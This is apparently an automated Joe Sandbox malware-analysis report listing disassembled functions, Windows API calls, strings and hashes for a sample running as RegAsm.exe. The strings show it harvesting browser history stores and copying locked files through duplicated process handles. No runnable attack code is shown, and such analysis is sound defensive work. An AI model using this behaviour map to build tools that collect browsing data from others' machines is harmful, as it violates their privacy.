                                                          • API ID: HandleModuleProcessTimes
                                                          • String ID: GetProcessTimes$kernel32.dll
                                                          • API String ID: 116129598-3385500049
                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                          APIs
                                                          • memset.MSVCRT ref: 0040E60F
                                                          • memset.MSVCRT ref: 0040E629
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Strings
                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                          • API String ID: 2887208581-2114579845
                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                          APIs
                                                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID:
                                                          • API String ID: 3473537107-0
                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                          APIs
                                                          Strings
                                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                                          • API String ID: 2221118986-1725073988
                                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmp
                                                          • String ID: $$8
                                                          • API String ID: 1475443563-435121686
                                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                          APIs
                                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                            • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                            • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                          • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                          • String ID:
                                                          • API String ID: 2722907921-0
                                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                          APIs
                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                          • memset.MSVCRT ref: 00403A55
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                          • String ID: history.dat$places.sqlite
                                                          • API String ID: 3093078384-467022611
                                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                          APIs
                                                            • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                          • GetLastError.KERNEL32 ref: 00417627
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$File$PointerRead
                                                          • String ID:
                                                          • API String ID: 839530781-0
                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID: *.*$index.dat
                                                          • API String ID: 1974802433-2863569691
                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@mallocmemcpy
                                                          • String ID:
                                                          • API String ID: 3831604043-0
                                                          • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                          • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$FilePointer
                                                          • String ID:
                                                          • API String ID: 1156039329-0
                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                          APIs
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                          • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                          • String ID:
                                                          • API String ID: 1125800050-0
                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleSleep
                                                          • String ID: }A
                                                          • API String ID: 252777609-2138825249
                                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID: BINARY
                                                          • API String ID: 2221118986-907554435
                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                          • _mbscpy.MSVCRT ref: 00405250
                                                          • _mbscat.MSVCRT ref: 0040525B
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 568699880-0
                                                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID: /stext
                                                          • API String ID: 2081463915-3817206916
                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$??2@CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 1023896661-0
                                                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                          • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 2445788494-0
                                                          • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                          • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmpmemset
                                                          • String ID:
                                                          • API String ID: 1065087418-0
                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                          APIs
                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                          • CloseHandle.KERNEL32(?), ref: 00410654
                                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                          • String ID:
                                                          • API String ID: 1381354015-0
                                                          • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                          • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                          APIs
                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                            • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                          • String ID:
